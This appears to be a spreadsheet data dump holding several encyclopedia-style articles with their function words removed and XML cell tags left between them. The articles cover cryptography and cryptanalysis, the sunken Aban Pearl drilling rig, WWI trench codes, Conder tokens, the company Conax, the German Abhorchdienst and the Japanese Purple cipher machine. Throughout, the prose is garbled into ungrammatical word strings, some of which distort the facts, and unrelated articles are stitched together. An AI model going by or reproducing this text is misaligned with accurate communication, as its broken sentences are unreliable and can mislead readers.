logarithm problems, deep connections abstract mathematics. there cryptosystems proven unconditionally secure. one-time one, proven claude shannon. there important algorithms proven secure certain assumptions. example, infeasibility factoring extremely large integers basis believing secure, systems, even proof unbreakability unavailable since underlying mathematical problem remains open. practice, widely used, believed unbreakable practice competent observers. there systems similar rsa, michael rabin provably secure provided factoring impossible; quite unusable practice. discrete logarithm problem basis believing cryptosystems secure, again, related, less practical systems provably secure relative solvability insolvability discrete problem.as well aware cryptographic history, cryptographic algorithm system designers must also sensibly consider probable future developments working designs. instance, continuous improvements computer processing power increased scope brute-force attacks, specifying lengths, required lengths similarly advancing. potential impact quantum computing already considered cryptographic system designers developing post-quantum cryptography. announced imminence small implementations machines making need preemptive caution rather merely speculative. modern cryptography symmetric-key cryptography symmetric-key cryptography refers encryption methods sender receiver share (or, less commonly, keys different, related easily computable way). this kind encryption publicly known june 1976. symmetric ciphers implemented either block ciphers stream ciphers. block cipher enciphers input blocks plaintext opposed individual characters, input form used stream cipher. data encryption standard (des) advanced encryption standard (aes) block cipher designs designated cryptography standards government (though des's designation finally withdrawn adopted). despite deprecation official standard, (especially still-approved much secure triple-des variant) remains quite popular; used across wide range applications, encryption e-mail privacy secure remote access. many block ciphers designed released, considerable variation quality. many, even designed capable practitioners, thoroughly broken, feal.stream ciphers, contrast 'block' type, create arbitrarily long stream material, combined plaintext bit-by-bit character-by-character, somewhat like one-time pad. stream cipher, output stream created based hidden internal state changes cipher operates. that internal state initially using secret material. widely used stream cipher. block ciphers used stream ciphers generating blocks keystream place pseudorandom number generator) applying operation plaintext keystream.message authentication codes (macs) much like cryptographic hash functions, except secret used authenticate hash value upon receipt; additional complication blocks attack scheme bare digest algorithms, thought worth effort. cryptographic hash functions third type cryptographic algorithm. they take message length input, output short, fixed-length hash, used (for example) digital signature. good hash functions, attacker cannot find messages produce hash. long-used hash function broken; md5, strengthened variant md4, also widely used broken practice. national security agency developed secure hash algorithm series md5-like hash functions: sha-0 flawed algorithm agency withdrew; sha-1 widely deployed secure md5, cryptanalysts identified attacks sha-2 family improves sha-1, vulnerable clashes 2011; standards authority thought "prudent" security perspective develop standard "significantly improve robustness nist's overall hash algorithm toolkit." thus, hash function design competition meant select u.s. national standard, called sha-3, 2012. competition ended october 2012, nist announced keccak would sha-3 hash algorithm. unlike block stream ciphers invertible, cryptographic hash functions produce hashed output cannot used retrieve original input data. cryptographic hash functions used verify authenticity data retrieved untrusted source layer security. public-key cryptography symmetric-key cryptosystems encryption decryption message, although message group messages different others. significant disadvantage symmetric ciphers management necessary securely. each distinct pair communicating parties must, ideally, share different key, perhaps ciphertext exchanged well. number keys required increases square number network members, quickly requires complex management schemes keep consistent secret. groundbreaking 1976 paper, whitfield diffie martin hellman proposed notion public-key (also, generally, called asymmetric key) cryptography different mathematically related keys used—a public private key. public system constructed calculation (the 'private key') computationally infeasible (the 'public key'), even though necessarily related. instead, keys generated secretly, interrelated pair. historian david kahn described public-key cryptography "the revolutionary concept field since polyalphabetic substitution emerged renaissance".in public-key cryptosystems, public freely distributed, paired private must remain secret. public-key encryption system, public used encryption, private secret used decryption. while diffie hellman could find system, showed public-key cryptography indeed possible presenting diffie–hellman exchange protocol, solution widely used secure communications allow parties secretly agree shared encryption key. x.509 standard defines commonly used format public certificates.diffie hellman's publication sparked widespread academic efforts finding practical public-key encryption system. this race finally 1978 ronald rivest, shamir, adleman, whose solution since become known algorithm.the diffie–hellman algorithms, addition first publicly known examples high-quality public-key algorithms, among widely used. other asymmetric-key algorithms include cramer–shoup cryptosystem, elgamal encryption, various elliptic curve techniques.a document published 1997 government communications headquarters (gchq), british intelligence organization, revealed cryptographers gchq anticipated several academic developments. reportedly, around 1970, james ellis conceived principles asymmetric cryptography. 1973, clifford cocks invented solution similar design rationale rsa. 1974, malcolm williamson claimed developed diffie–hellman exchange. public-key cryptography also used implementing digital signature schemes. digital signature reminiscent ordinary signature; characteristic easy user produce, difficult anyone else forge. digital signatures also permanently tied content message signed; cannot 'moved' document another, attempt detectable. digital signature schemes, algorithms: signing, secret used process message hash message, both), verification, matching public used message check validity signature. popular digital signature schemes. digital signatures central operation public infrastructures many network security schemes (e.g., ssl/tls, many vpns, etc.).public-key algorithms often based computational complexity "hard" problems, often number theory. example, hardness related integer factorization problem, diffie–hellman related discrete logarithm problem. security elliptic curve cryptography based number theoretic problems involving elliptic curves. because difficulty underlying problems, public-key algorithms involve operations modular multiplication exponentiation, much computationally expensive techniques used block ciphers, especially typical sizes. result, public-key cryptosystems commonly hybrid cryptosystems, fast high-quality symmetric-key encryption algorithm used message itself, relevant symmetric sent message, encrypted using public-key algorithm. similarly, hybrid signature schemes often used, cryptographic hash function computed, resulting hash digitally signed. cryptographic hash functions cryptographic hash functions cryptographic algorithms ways generate utilize specific keys encrypt data either symmetric asymmetric encryption, functions viewed keys themselves. they take message length input, output short, fixed-length hash, used (for example) digital signature. good hash functions, attacker cannot find messages produce hash. long-used hash function broken; md5, strengthened variant md4, also widely used broken practice. national security agency developed secure hash algorithm series md5-like hash functions: sha-0 flawed algorithm agency withdrew; sha-1 widely deployed secure md5, cryptanalysts identified attacks sha-2 family improves sha-1, vulnerable clashes 2011; standards authority thought "prudent" security perspective develop standard "significantly improve robustness nist's overall hash algorithm toolkit." thus, hash function design competition meant select u.s. national standard, called sha-3, 2012. competition ended october 2012, nist announced keccak would sha-3 hash algorithm. unlike block stream ciphers invertible, cryptographic hash functions produce hashed output cannot used retrieve original input data. cryptographic hash functions used verify authenticity data retrieved untrusted source layer security. cryptanalysis goal cryptanalysis find weakness insecurity cryptographic scheme, thus permitting subversion evasion. common misconception every encryption method broken. connection wwii work bell labs, claude shannon proved one-time cipher unbreakable, provided material truly random, never reused, kept secret possible attackers, equal greater length message. most ciphers, apart one-time pad, broken enough computational effort brute force attack, amount effort needed exponentially dependent size, compared effort needed make cipher. cases, effective security could achieved proven effort required (i.e., "work factor", shannon's terms) beyond ability adversary. this means must shown efficient method opposed time-consuming brute force method) found break cipher. since proof found date, one-time-pad remains theoretically unbreakable cipher. although well-implemented one-time-pad encryption cannot broken, traffic analysis still possible. there wide variety cryptanalytic attacks, classified several ways. common distinction turns attacker) knows capabilities available. ciphertext-only attack, access ciphertext (good modern cryptosystems usually effectively immune ciphertext-only attacks). known-plaintext attack, access ciphertext corresponding plaintext many pairs). chosen-plaintext attack, choose plaintext learn corresponding ciphertext (perhaps many times); example gardening, used british wwii. chosen-ciphertext attack, able choose ciphertexts learn corresponding plaintexts. finally man-in-the-middle attack gets alice (the sender) (the recipient), accesses modifies traffic forwards recipient. also important, often overwhelmingly mistakes (generally design protocols involved). cryptanalysis symmetric-key ciphers typically involves looking attacks block ciphers stream ciphers efficient attack could perfect cipher. example, simple brute force attack requires known plaintext decryptions, trying approximately half possible keys, reach point chances better even sought found. enough assurance; linear cryptanalysis attack requires known plaintexts (with corresponding ciphertexts) approximately operations. this considerable improvement brute force attacks. public-key algorithms based computational difficulty various problems. famous difficulty integer factorization semiprimes difficulty calculating discrete logarithms, proven solvable polynomial time using classical turing-complete computer. much public-key cryptanalysis concerns designing algorithms solve problems, using technologies, quantum computers. instance, best-known algorithms solving elliptic curve-based version discrete logarithm much time-consuming best-known algorithms factoring, least problems less equivalent size. thus, achieve equivalent strength encryption, techniques depend upon difficulty factoring large composite numbers, cryptosystem, require larger keys elliptic curve techniques. reason, public-key cryptosystems based elliptic curves become popular since invention mid-1990s. while pure cryptanalysis uses weaknesses algorithms themselves, attacks cryptosystems based actual algorithms real devices, called side-channel attacks. cryptanalyst access example, amount time device took encrypt number plaintexts report error password character, able timing attack break cipher otherwise resistant analysis. attacker might also study pattern length messages derive valuable information; known traffic analysis quite useful alert adversary. poor administration cryptosystem, permitting short keys, make system vulnerable, regardless virtues. social engineering attacks humans (e.g., bribery, extortion, blackmail, espionage, torture, ...) usually employed cost-effective feasible perform reasonable amount time compared pure cryptanalysis high margin. cryptographic primitives much theoretical work cryptography concerns cryptographic primitives—algorithms basic cryptographic properties—and relationship cryptographic problems. more complicated cryptographic tools built basic primitives. these primitives provide fundamental properties, used develop complex tools called cryptosystems cryptographic protocols, guarantee high-level security properties. note, however, distinction cryptographic primitives cryptosystems, quite arbitrary; example, algorithm sometimes considered cryptosystem, sometimes primitive. typical examples cryptographic primitives include pseudorandom functions, one-way functions, etc. cryptosystems cryptographic primitives often used develop complex algorithm, called cryptographic system, cryptosystem. cryptosystems (e.g., el-gamal encryption) designed provide particular functionality (e.g., public encryption) guaranteeing certain security properties (e.g., chosen-plaintext attack (cpa) security random oracle model). cryptosystems properties underlying cryptographic primitives support system's security properties. distinction primitives cryptosystems somewhat arbitrary, sophisticated cryptosystem derived combination several primitive cryptosystems. many cases, cryptosystem's structure involves back forth communication among parties space (e.g., sender secure message receiver) across time (e.g., cryptographically protected backup data). such cryptosystems sometimes called cryptographic protocols. some widely known cryptosystems include rsa, schnorr signature, elgamal encryption, pretty good privacy (pgp). more complex cryptosystems include electronic cash systems, signcryption systems, etc. some 'theoretical' cryptosystems include interactive proof systems, (like zero-knowledge proofs), systems secret sharing, etc. lightweight cryptography lightweight cryptography (lwc) concerns cryptographic algorithms developed strictly constrained environment. growth internet things (iot) spiked research development lightweight algorithms better suited environment. environment requires strict constraints power consumption, processing power, security. algorithms present, aes, speck examples many algorithms developed achieve standard national institute standards technology. applications general cryptography widely used internet help protect user-data prevent eavesdropping. ensure secrecy transmission, many systems private cryptography protect transmitted information. with public-key systems, maintain secrecy without master large number keys. but, algorithms like bitlocker veracrypt generally private-public cryptography. such veracrypt, uses password hash generate single private key. however, configured public-private systems. opensource encryption library openssl provides free opensource encryption software tools. commonly used encryption cipher suit aes, hardware acceleration based processors aes-ni. close contender chacha20-poly1305, stream cipher, however commonly used mobile devices based feature aes-ni instruction extension. cybersecurity cryptography used secure communications encrypting them. websites encryption https. "end-to-end" encryption, sender receiver read messages, implemented email pretty good privacy secure messaging general whatsapp, signal telegram.operating systems encryption keep passwords secret, conceal parts system, ensure software updates truly system maker. instead storing plaintext passwords, computer systems store hashes thereof; then, user logs system passes given password cryptographic hash function compares hashed value file. manner, neither system attacker point access password plaintext.encryption sometimes used encrypt one's entire drive. example, university college london implemented bitlocker program microsoft) render drive data opaque without users logging virtual money, blockchain, cryptocurrency social issues legal issues prohibitions cryptography long interest intelligence gathering enforcement agencies. secret communications criminal even treasonous. because facilitation privacy, diminution privacy attendant prohibition, cryptography also considerable interest civil rights supporters. accordingly, history controversial legal issues surrounding cryptography, especially since advent inexpensive computers made widespread access high-quality cryptography possible. countries, even domestic cryptography been, restricted. until 1999, france significantly restricted cryptography domestically, though since relaxed many rules. china iran, license still required cryptography. many countries tight restrictions cryptography. among restrictive laws belarus, kazakhstan, mongolia, pakistan, singapore, tunisia, vietnam.in united states, cryptography legal domestic use, much conflict legal issues related cryptography. particularly important issue export cryptography cryptographic software hardware. probably importance cryptanalysis world expectation cryptography would continue important national security, many western governments have, point, strictly regulated export cryptography. after world illegal sell distribute encryption technology overseas; fact, encryption designated auxiliary military equipment united states munitions list. until development personal computer, asymmetric algorithms (i.e., public techniques), internet, especially problematic. however, internet grew computers became widely available, high-quality encryption techniques became well known around globe. export controls 1990s, several challenges export regulation cryptography. after source code philip zimmermann's pretty good privacy (pgp) encryption program found onto internet june 1991, complaint security (then called data security, inc.) resulted lengthy criminal investigation zimmermann customs service fbi, though charges ever filed. daniel bernstein, graduate student berkeley, brought lawsuit </t>
  </si>
  <si>
    <t>Aban Pearl</t>
  </si>
  <si>
    <t>aban pearl twin-hull, column-stabilized, semi-submersible offshore drilling owned operated aban offshore drilling company. registered singapore. 2009, aban pearl became first offshore operated venezuela's state-owned company pdvsa. 2010, sank though workers aboard time saved. background aban pearl designed aker built 1977 east levingston shipbuilding (now part keppel corporation) levingston singapore shipyard. aban pearl could operate rated water depth 1,250 feet (380 drilling depth 25,000 feet (7,600 history 1977–1996, named transocean seeker, 1996 treasure seeker 1996–2000 transocean discoverer. time owned transocean. 2000–2007, named bulford dolphin operated bahamas flag. bulford dolphin purchased us$43.27 million bonheur ganger rolf asa. operated dolphin drilling, subsidiary fred. olsen energy. incidents 2006, contracted nigerian company peak petroleum, attacked near nigeria nigerian militants eight personnel kidnapped. they released unharmed days captivity. 2007, purchased indian drilling company aban us$211 million.in 2009, contracted five-year contract pdvsa drilling natural wells mariscal sucre complex coast northeastern venezuela caribbean sea. august 2009 route trinidad tobago venezuela flotation devices took water heavy seas nautical miles (3.7 south-west point baline, gaspar grande, trinidad tobago call evacuate platform.on 2010 2:20 a.m. (0650 gmt), drilling dragon field, scheduled come stream 2012, sank deep feet (160 water entered subsea pontoon. crew members evacuated nearby drilling ship neptune discoverer. according venezuelan energy minister rafael ramirez, well explored aban pearl safely sealed. there plans retrieve rig. company's biggest money earners bringing $358,000 dollars, 10.5 million rupees day. insurance claim $235 million settled july 2010. also deepwater horizon spill references external links aban pearl (aban offshore website) (pdf)</t>
  </si>
  <si>
    <t>Trench code</t>
  </si>
  <si>
    <t>trench codes form cryptography) codes used secrecy field armies world messages field telephone, radio carrier pigeons could intercepted, hence need tactical world cryptography. originally, commonly used codes simple substitution codes, relative vulnerability classical cipher, trench codes came existence. (important messages generally used alternative encryption techniques greater security.) codes required distribution codebooks military personnel, proved security liability since books could stolen enemy forces.by middle world conflict settled static battle attrition, sides sitting huge lines fixed earthwork fortifications. with armies generally immobile, distributing codebooks protecting easier would armies move. however, armies still danger trench-raiding parties would sneak enemy lines snatch codebooks. when happened, alarm could raised code quickly changed. trench codes changed regular basis attempt prevent code breakers deciphering messages. french army french began develop trench codes early 1916. they started telephone codes, implemented request general whose forces suffered devastating artillery bombardments indiscretions telephone conversations men. original telephone code featured small two-letter codewords spelled voice communications. this grew three-letter code scheme, adopted wireless, early one-part code implementations evolving secure two-part code implementations. british began adopt trench codes well. german army germans started using trench codes spring 1917, evolving book 4,000 codewords changed twice month, different codebooks used different sectors front. french codebreakers extremely competent cracking ciphers somewhat inexperienced cracking codes, require slightly different mindset. took time point able crack german codes timely fashion. u.s. troops americans relative newcomers cryptography entered war, star players. parker hitt, 1878, army signal corps instructor. first bring army cryptology 20th century, publishing influential short work subject 1915 called manual solution military ciphers, publication date 1916, available https://archive.org/details/manualforsolutio00hittrich. assigned france administrative role, advice eagerly sought colleagues working operational cryptology. another signal corps officer would make mark cryptology joseph mauborgne, 1914, first lieutenant, first publish solution playfair cipher. when americans began moving front numbers early 1918, adopted trench codes: became competent construction, captain howard barnes eventually learning produce rate surprised british colleagues. americans adopted series codes named rivers, beginning "potomac". they learned print codebooks paper burned easily degraded quickly weeks, codes would presumably obsolete, using font easy read trench conditions. communications discipline american code makers often frustrated inability refusal combat units codes—or worse, properly. soldier engaged combat always feel need things book" even good reasons generals front line felt things worry about. col. frank moorman, reviewing wireless intelligence 1920. wrote: that real problem future, make front realize importance handling codes carefully observing "foolish" little details code insists they cannot need want they anything idea would hang offenders. this would would discourage development others. would saving lives sacrifice american lives unnecessarily assist enemy solution code. p.269 british french already familiar problems "communications discipline". they completely solved problems either, least managed heads signalmen time properly encrypt message, bother trying; send message unencrypted, clear". partially badly encrypted message could undermine cipher code system, sometimes completely, made unencrypted message preferable. example below pages u.s. army world trench code, edition designated "seneca:": pp.185–188 references this article, earlier version incorporates material greg goebel's codes, ciphers, codebreaking.</t>
  </si>
  <si>
    <t>Conder token</t>
  </si>
  <si>
    <t>conder tokens, also known 18th-century provincial tokens, form privately minted token coinage struck used latter part 18th century early part 19th century england, anglesey wales, scotland, ireland. driving force behind need token coinage shortage small denomination coins everyday transactions. however, demand fueled factors industrial revolution, population growth, preponderance counterfeit circulating coins. because government made little effort ameliorate shortage, private business owners merchants took matters hands, first tokens type issued 1787 workers parys mine company. 1795, millions tokens thousand varying designs struck common throughout great britain. collecting conder tokens popular since shortly first manufactured, resulting availability today many highly preserved examples collectors. demarcation considered conder token somewhat unclear; however, collectors consider conder tokens include indexed originally james conder later dalton hamer. history coin shortage great britain, shortage small denomination coinage reported early late 14th century. such shortage made difficult workers paid, transactions daily life carried out. shortages persisted worsened late 17th century became particularly problematic middle 18th century. shortage small denomination coinage reached critical mass move many workers away agricultural jobs work force factories industrial revolution. growing payrolls factories nearly impossible meet employers supply coins. time, population growth rate great britain 1750 1800 nearly quadrupled. situation made worse outflow british silver coins gresham's law, preponderance counterfeit copper coins circulation, royal mint's sporadic production non-gold coins late 17th century late 18th century. many years, copper silver coins minted all, 1775 king george halted production copper coinage royal mint. 1768, largest veins copper world found parys mountain island anglesey northwest wales. 1785, thomas williams (the "copper king"), acting representative parys mine company, master british mint propose regal copper coins struck using counterfeit-deterrent method edge lettering, offering technology mint free charge. stipulation supply copper coins would come parys mine company. british mint master entertain offer. 1786, two-thirds coins circulation britain counterfeit, royal mint responded shutting down, worsening situation. silver coins passed genuine. even copper coins melted replaced lightweight fakes. royal mint struck copper coins years, 1773 1821. rare occasions royal mint strike coins, relatively crude, quality control nonexistent. february 1787 williams oversaw minting first many privately issued copper tokens, used workers parys mine company. these first tokens bore image hooded druid, within months time receiving attention london possible solution shortage small denomination coin. long appearance druid tokens, cities, businesses, proprietors would follow suit begin designing minting small denomination coinage. matthew boulton soho mint demand small denomination coin flourished, popularity copper tokens approximated size halfpenny grew rapidly. prolific producers private tokens (struck behalf merchants) matthew boulton. fact, lifetime boulton would strike millions merchant pieces. boulton stranger manufacture small metal items, grown managed family business many years, specialized buckles. mid-1780s boulton turned attention coinage; eyes coins tokens another small metal product like manufactured years. also shares several cornish copper mines, large personal stock copper, purchased mines unable dispose elsewhere. however, orders counterfeit money sent him, refused them: anything, short common informer particular persons, stop malpractices birmingham coiners." 1788 established soho mint part industrial plant. mint included eight steam-driven presses, striking coins minute. boulton spent much time london lobbying contract strike british coins, june 1790 william pitt government postponed decision recoinage indefinitely. meanwhile, soho mint struck coins east india company, sierra leone russia, producing high-quality planchets, blank coins, struck national mints elsewhere. firm sent million blanks philadelphia, struck cents half-cents united states mint.the national financial crisis reached point despair february 1797, bank england stopped redeeming bills gold. effort money circulation, government adopted plan issue large quantities copper coins, lord hawkesbury summoned boulton london march 1797, informing government's plan, awarded contract month. according proclamation dated july 1797, king george "graciously pleased give directions measures might taken immediate supply copper coinage might best adapted payment laborious poor present exigency". proclamation required coins weigh ounces respectively, bringing intrinsic value coins close face value. with return large quantities government issued small denomination coin (twopence pennies minted soho mint 1797, halfpennies farthings followed 1799), need locally issued token coinage waned. return government coinage 1802, production privately issued provincial tokens ceased. however, next years intrinsic value copper rose. return privately minted token coinage evident 1811 endemic 1812, government issued copper coinage melted trade. royal mint undertook massive recoinage programme 1816, large quantities gold silver coin minted. thwart issuance private token coinage, 1817 parliament passed forbade manufacture private token coinage severe penalties. truck 1831 finally banned employers paying workers using tokens. collecting early collectors early issue private token coinage served purpose ease everyday transactions. but, 1793, hobby collecting trading various tokens achieved widespread popularity. most tokens issued early years primarily intended circulation. however, manufacturers soon found issuing token designs limited mintage meant could sold directly collectors tidy profits. enterprising collectors even funded issue small mintage tokens design. these self-made "rare" tokens would used trade collectors attempt fill collections many varieties possible. evidence collecting craze, three extensive reference works indexing collecting provincial tokens published 1800 (first edition 1795), birchall (1796), conder (1798). none three published works undertaken accomplished numismatic researchers, instead undertaken personal interest largely based personal collections authors. because widespread "collecting mania", great number extremely well preserved tokens survive today, tucked away private collections decades. topics designs because conder tokens minted independently government, creators tokens freedom make political statements social commentary, honour great men, ideals, great events, simply advertise businesses. subjects range isaac newton abolition, prisons mental institutions circus performers. issuers coins needed means mint coin. many tokens officially payable certain areas locations, doubt copper promissory tokens treated official copper coin many time circulated widely. 1795, thousands different designs circulating, great majority tokens halfpennies. cataloging attribution conder tokens named james conder early collector cataloguer tokens. building work conder intermediary reference works, definitive exhaustive work attributing conder tokens used modern collectors dalton hamer. each token identified based four large geographic regions (england, anglesey wales, scotland, ireland), county. within county issue, unique combination obverse reverse design assigned number (referred number), variations edge lettering differentiated lower case letter following number designation. general, tokens organized within county pennies listed first (lowest numbers), halfpennies, finally farthings (highest numbers). also quite common collectors refer token specific city, business, series issue within larger county category. tokens issued denominations penny, halfpenny, farthing, less common denominations also indexed dalton hamer. vast majority tokens indexed period struck copper, even denominations threepence, shilling, others. dalton hamer classifications great britain anglesey wales scotland ireland rarity tokens when originally published, dalton hamer assigned rarity information token based number minted pairing, edge type. over time estimates found overestimates mintages, whereas others underestimated mintages. tokens classified large groups called "common", "scarce", "rare", "very rare", "extremely rare". while tokens classified rare based varied edge lettering, sought tokens small mintages particular obverse and/or reverse design. also local currency private currency references notes citations bibliography birchall, samuel (1796). descriptive list provincial copper coins tokens issued years 1786 1796 arranged alphabetically samuel birchall leeds originals possession. leeds, england: thomas gill. conder, james (1798). arrangement provincial coins, tokens, medalets issued great britain, ireland, colonies, within last twenty years, farthing penny size (first ed.). ipswich, england: jermyn. dalton, richard; hamer, samuel (1910–17). provincial token-coinage 18th century. dykes, david (2011). coinage currency eighteenth-century britain. provincial coinage. london: spink. isbn 978-1-907427-16-9. hamer, samuel (april 1903). "notes private tokens, issuers die-sinkers (part (pdf). british numismatic journal: 299–332. {{cite journal}}: cite journal requires |journal= (help) hamer, samuel (1905). "notes private tokens, issuers die-sinkers (part (pdf). british numismatic journal: 369–396. {{cite journal}}: cite journal requires |journal= (help) hamer, samuel (1906). "notes private tokens, issuers die-sinkers (part (pdf). british numismatic journal: 271–279. {{cite journal}}: cite journal requires |journal= (help) hocking, william john (1906). catalogue coins, tokens, medals, dies, seals museum royal mint. london: darling son, ltd. 327–343. lobel, richard (1999), coincraft's 2000 standard catalogue english coins, 1066 date, standard catalogue publishers, isbn 978-0-9526228-8-8 mayhew, nicholas (1999). sterling: rise fall currency. penguin group. 104–05. isbn 978-0-7139-9258-8. pye, charles (1801). correct complete representation provincial copper coins, tokens trade, cards address, copper, which circulated years 1787 1801, entirely superseded; copper coinage time circulation, issued authority government (second ed.). birmingham: matthew young. rodgers, kerry (may 2009). "boulton father mechanized press". world coin news: 56–58. {{cite journal}}: cite journal requires |journal= (help) selgin, george (2011). good money: birmingham button makers, royal mint, beginnings modern coinage, 1775-1821. oakland, independent institute. isbn 978-1598130430. smiles, samuel (1865), lives boulton watt, london: john murray symons, david (2009), "'bringing perfection coining': what make soho mint?", mason, shena (ed.), matthew boulton: selling what world desires, haven, ct.: yale university press, 89–98, isbn 978-0-300-14358-4 tungate, (2009). "matthew boulton's mints: copper customer". mason, shena (ed.). matthew boulton: selling what world desires. haven, ct.: yale university press. 80–88. isbn 978-0-300-14358-4.waters, arthur (1906). notes gleaned contemporary literature, respecting issuers eighteenth century tokens: struck county middlesex: arranged according atkins's tradesmen's tokens. leamington spa: simons waters. withers, paul; withers, bente (2010). token book: 17th 18th 19th century tokens values. llanfyllin, galata print ltd. 219–388. isbn 978-0-9543162-8-0. king: proclamation". london gazette. july 1797. retrieved june 2009. ultimate guide conder tokens: provincial token-coinage 18th century digital quick reference (first ed.). rockaway, numissource, llc; digital numismatic publishing. 2010. isbn 978-0-9841402-0-6.other sources mckivor, bill. history 18th century provincial tokens (conder tokens)". copper corner. retrieved june 2013. external links conder token collector's club (ctcc)</t>
  </si>
  <si>
    <t>Conax</t>
  </si>
  <si>
    <t>conax develops television encryption, conditional access content security digital television. conax provide technology operators countries. company offices norway (headquarters), russia, germany, brazil, united states, canada, mexico, indonesia, philippines, thailand, china, singapore, india, 24/7 global support center india. conax stems telenor research labs 1980s. incorporated separate company conax 1994.in march 2014, company sold telenor group swiss-based kudelski group billion.conax employs several versions, namely conax conax conax conax conax contego. those versions shared amongst types cam: chipset pairing generic/non-chipset pairing compatible smart cards support other. company also provide drm-solution streaming services based microsoft playready google widevine. operators using conax conditional access are: homesat (lebanon) rikstv (norway) allente (norway) (previously viasat/canal digital satellite) telenor (norway sweden) malivision (mali) startimes media (ssa) dish (india) k-vision (indonesia) joyne netherlands jstv (europe) focus (operated romania, later group) akta telecom romania romania mindig hungary myanmar siticable india digicable india digitalb (albania) cignal philippines (serbia) telered (argentina) antiksat (slovakia) cyfrowy polsat, platforma canal+ orange polska (poland)conax also used media's free channels (rcti, mnctv, gtv, inews) k-vision encrypt programs satellite transmissions prevent illegal redistribution unlicensed local cable operators others third parties. references external links official website english)</t>
  </si>
  <si>
    <t>Abhorchdienst</t>
  </si>
  <si>
    <t>abhorchdienst (i.e. "listening bureau") german code-breaking bureau operated final years first world war. established 1916 composed mainly mathematicians. other countries, france austria-hungary, similar organisations earlier stage, military context necessitate development german bureau 1916. references</t>
  </si>
  <si>
    <t>Type B Cipher Machine</t>
  </si>
  <si>
    <t>history cryptography, "system typewriter european characters" (九七式欧文印字機) "type cipher machine", codenamed purple united states, encryption machine used japanese foreign office february 1939 world machine electromechanical device used stepping-switches encrypt sensitive diplomatic traffic. messages written 26-letter english alphabet, commonly used telegraphy. japanese text transliterated coded. 26-letters separated using plug board groups, twenty letters respectively. letters sixes group scrambled using substitution table, letters twenties group thoroughly scrambled using three successive substitution tables.the cipher codenamed "purple" replaced type machine previously used japanese foreign office. sixes twenties division familiar u.s. army signals intelligence service (sis) cryptographers work type cipher allowed make early progress sixes portion messages. twenties cipher proved much difficult, breakthrough september 1940 allowed army cryptographers construct machine duplicated behavior (was analog) japanese machines, even though u.s. description one.the japanese also used stepping-switches systems, codenamed coral jade, divide alphabets. american forces referred information gained decryptions magic. development japanese cipher machines overview imperial japanese navy cooperate army pre-war cipher machine development, lack cooperation continued world navy believed purple machine sufficiently difficult break attempt revise improve security. this seems advice mathematician, teiji takagi, lacked background cryptanalysis. ministry foreign affairs supplied purple navy. japanese authority noticed weak points machines. just war, army warned navy weak point purple, navy failed advice.the army developed cipher machines principle enigma 92-shiki injiki, 97-shiki injiki 1-shiki 1-go injiki 1932 1941. army judged machines lower security navy's purple design, army's cipher machines less used. prototype japanese diplomatic communications negotiations washington naval treaty broken american black chamber 1922, became publicly known, considerable pressure improve security. case, japanese navy planned develop first cipher machine following london naval treaty. japanese navy captain risaburo ito, section (cipher code) japanese navy general staff office, supervised work. development machine responsibility japanese navy institute technology, electric research department, section 1928, chief designer kazuo tanabe navy commander genichiro kakimoto developed prototype red, "roman-typewriter cipher machine". prototype used principle kryha cipher machine, plug-board, used japanese navy ministry foreign affairs negotiations london naval treaty 1930. prototype machine finally completed "type typewriter" 1931. year 1931 year 2591 japanese imperial calendar. thus prefixed "91-shiki" year developed. 91-shiki injiki roman-letter model also used ministry foreign affairs "type cipher machine", codenamed "red" united states cryptanalysts. machine unreliable unless contacts half-rotor switch cleaned every day. enciphered vowels (aeiouy) consonants separately, perhaps reduce telegram costs,: 842–849 significant weak point. navy also used 91-shiki injiki kana-letter model bases vessels. purple 1937, japanese completed next generation "type typewriter". ministry foreign affairs machine "type cipher machine", codenamed purple united states cryptanalysts. chief designer purple kazuo tanabe. engineers masaji yamamoto eikichi suzuki. eikichi suzuki suggested stepping switch instead troublesome half-rotor switch. clearly, purple machine secure red, navy recognize already broken. purple machine inherited weakness machine letters alphabet encrypted separately. differed group letters changed announced every nine days, whereas permanently fixed latin vowels 'a', 'e', 'i', 'o', 'y'. thus army able break cipher used letters able break used others. design type cipher machine consisted several components. reconstructed army, electric typewriters either end, similar used type machine. type organized encryption follows: input typewriter input plugboard permutes letters typewriter keyboard separates group letters group letters stepping switch layers wired select permutations letters sixes group three stages stepping switches iii), connected series. each stage effectively layer switch outputs layer. each stage selects permutations letters twenties group. japanese used three 7-layer stepping switches geared together build stage (see photos). u.s. used four 6-layer switches stage first analog machine. output plug board reverses input permutation sends letters output typewriter printing output typewriterfor decryption, data flow reversed. keyboard second typewriter becomes input twenties letters pass stepping switch stages opposite order. stepping switches stepping switch multi-layer mechanical device commonly used time telephone switching systems. each layer electrical connects, type arranged semicircular arc. these move called stator. wiper rotor focus semicircle connects stator contact time. rotors layer attached single shaft advances stator contact next whenever electromagnet connected ratchet pulsed. there actually wiper arms level, connected together, wiper advance past last contact semicircle, engages first contact. this allows rotor connections keeps cycling stator contacts electromagnet pulsed.to encrypt twenties letters, 20-layer stepping switch needed three stages. both japanese version early american analog constructed stage several smaller stepping switches type used telephone central offices. american analog used four 6-level switches create 20-layer switch. four switches stage wired step synchronously. fragment type japanese machine display national cryptologic museum, largest piece known existence, three 7-layer stepping switches (see photo). u.s. army developed improved analog 1944 layers needed stage single shaft. additional layer used improved analog automatically switch bank initial position specified key. however implemented, 20-layer stepping switch stage rotor connections stator connections, wiper stator contacts layer. each stage must exactly connections connect adjacent stage plugboard. rotor side, problem rotors. stator stage, every column stator contacts corresponding rotor position layers connected output wires (leads diagram) scrambled order, creating permutation inputs. this done differently rotor positions. thus stator output wire connections, rotor position, though different levels. connections needed created "rats nest" wires early u.s. analog. improved analog organized wiring neatly three matrices soldering terminals visible stepping switch photograph. stepping order stages bi-directional. signals went stage direction encryption direction decryption. unlike system german enigma machine, order stages fixed reflector. however stepping arrangement could changed. sixes switches stepped position character encrypted decrypted. motions switches twenties stages complex. three stages assigned step fast, medium slow. there possible ways make assignment choice determined number included beginning message called message indicator. u.s. improved analog six-position switch making assignment, photo. message indicator also specified initial positions twenties switches. indicator different message part message, multi-part messages sent. final part key, alphabet plugboard arrangement, changed daily. twenties switch stepping controlled part sixes switch. exactly three switches stepped character. fast switch stepped character except sixes switch 25th position. then medium switch stepped, unless 25th position, case slow switch stepped. weaknesses cryptanalysis learned 1938 forthcoming introduction diplomatic cipher decoded messages. type messages began appear february 1939. type several weaknesses, design, others used. frequency analysis could often make letters ciphertext alphabet letters stand letters, uniformly distributed. this suggested type used similar division plaintext letters used type weaker encryption used "sixes" easier analyze. sixes cipher turned polyalphabetic fixed permuted alphabets, used succession. difference messages different indicators starting position list alphabets. team recovered permutations april 1939. frequency analysis complicated presence romanized 